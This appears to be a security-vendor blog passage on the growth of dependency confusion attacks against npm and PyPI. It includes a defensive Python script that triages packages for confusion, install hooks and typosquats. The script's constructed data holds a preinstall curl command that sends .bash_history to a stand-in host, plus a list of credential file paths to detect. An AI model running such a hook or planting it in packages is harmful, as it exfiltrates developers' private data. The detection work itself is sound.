Ever since the dependency confusion (or namespace confusion) technique gained widespread attention in early 2021, the momentum behind these attacks has yet to slow down.
Researcher Alex Birsan's extensive eight-month ethical hacking project ended with him hacking more than 35 big tech firms via this simple technique and walking away with over $130,000 in bug bounties.
Next in line were open source “vigilantes,” who hijacked the technique for their own cause.
Last year, a pseudonymous user, RemindSupplyChainRisks, polluted the PyPI and npm registries with over 5,000 packages in an attempt to educate the wider community about security threats to open source repositories.
Within 72 hours of Birsan’s disclosure, Sonatype saw 300+ copycat packages, none of them from Birsan, flood npm. After seeing the earning potential, bug bounty hunters jumped on the bandwagon to capitalize on the technique too.

What may have started out as a research project by a bug bounty hunter was soon abused by threat actors looking to target popular companies and exfiltrate sensitive files, such as .bash_history and /etc/shadow, as Sonatype previously discovered.
In the following weeks, we saw upwards of 10,000 copycat packages posted to the npm and PyPI ecosystems. Some of these were posted by open-source software ‘activists’ to spread awareness of the security risks posed by this technique, whereas others were outright malicious, targeting big names.
Just last month we reported seeing more than 1,200 dependency confusion packages flooding PyPI.
And it hasn’t stopped here.
As of today, Sonatype’s automated malware detection systems have caught upwards of 63,000 packages. These include dependency confusion copycats, malicious packages (containing embedded malware), and suspicious typosquats, with the majority of them leveraging the dependency confusion technique.
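The three package categories named above (dependency confusion copycats, packages with malicious install-time behaviour, and typosquats) can be triaged with fairly simple heuristics before any package from a public registry is allowed into a build. The script below is an added example, not Sonatype's detection code. The internal package list, the "popular" name list, the registry metadata and the install scripts are all constructed, and the high-version-number threshold is an assumption chosen for illustration.

```python
"""Heuristic triage of packages fetched from a public registry (npm-style manifests).

Added example, not Sonatype's detection code. It flags the patterns discussed
above: an internal package name that suddenly exists on the public registry
(dependency confusion candidate), install-time scripts that touch sensitive
host files such as .bash_history or /etc/shadow, and names one edit away from
a well-known package (typosquat). All package data below is constructed.
"""
import re

# Constructed: names that exist only on the organisation's private registry.
INTERNAL_PACKAGES = {"acme-auth-client", "acme-billing-utils"}

# Constructed: a handful of well-known public names to compare against.
POPULAR_PACKAGES = {"lodash", "express", "react"}

# Constructed stand-in for public registry metadata (no network access needed).
PUBLIC_REGISTRY = {
    "acme-auth-client": {
        "version": "99.0.0",
        "scripts": {"preinstall": "curl -d @$HOME/.bash_history http://collector.invalid/"},
    },
    "left-pad": {"version": "1.3.0", "scripts": {}},
    "lodahs": {"version": "4.17.0", "scripts": {"postinstall": "node setup.js"}},
}

SENSITIVE_PATHS = (".bash_history", "/etc/shadow", ".ssh/", ".npmrc", ".pypirc")
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")
# Heuristic threshold (assumption): copycats publish very high versions so the resolver prefers them.
SUSPICIOUS_MAJOR = 50


def osa_distance(a: str, b: str) -> int:
    """Optimal-string-alignment edit distance (insert, delete, substitute, adjacent swap)."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def triage(name: str, meta: dict, internal=INTERNAL_PACKAGES, popular=POPULAR_PACKAGES) -> list:
    """Return a list of finding strings for one public package; empty means nothing flagged."""
    findings = []
    # 1. Dependency confusion: an unscoped internal name now resolvable from the public registry.
    if name in internal and not name.startswith("@"):
        findings.append("dependency-confusion: internal name is published on the public registry")
    major = re.match(r"(\d+)", meta.get("version", "0"))
    if major and int(major.group(1)) >= SUSPICIOUS_MAJOR:
        findings.append(f"suspicious-version: {meta['version']} looks chosen to win resolution")
    # 2. Install-time hooks: code that runs on 'npm install', with or without sensitive paths.
    for hook, cmd in meta.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue
        hits = [p for p in SENSITIVE_PATHS if p in cmd]
        if hits:
            findings.append(f"exfil-risk: {hook} references {', '.join(hits)}")
        else:
            findings.append(f"install-hook: {hook} runs code at install time")
    # 3. Typosquat: one edit (or adjacent swap) away from a well-known name.
    for known in popular:
        if name != known and osa_distance(name, known) == 1:
            findings.append(f"typosquat: resembles {known}")
    return findings


def scan_registry(registry=PUBLIC_REGISTRY) -> dict:
    """Triage every package and keep only those with findings."""
    report = {}
    for name, meta in registry.items():
        findings = triage(name, meta)
        if findings:
            report[name] = findings
    return report


if __name__ == "__main__":
    for pkg, notes in scan_registry().items():
        print(pkg)
        for n in notes:
            print("  -", n)
```

Running the script reports `acme-auth-client` (internal name on the public registry, an implausibly high version, and a preinstall hook that reads `.bash_history`) and `lodahs` (one adjacent swap away from `lodash`, with a postinstall hook), while `left-pad` passes clean. In practice the dependency confusion check is the one to automate first: any unscoped internal name that becomes resolvable from a public registry should block the build until the package is reserved or the resolver is pinned to the private registry.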
Whenever Sonatype has come across malicious or suspicious packages that require immediate remediation, we have promptly notified the corresponding repository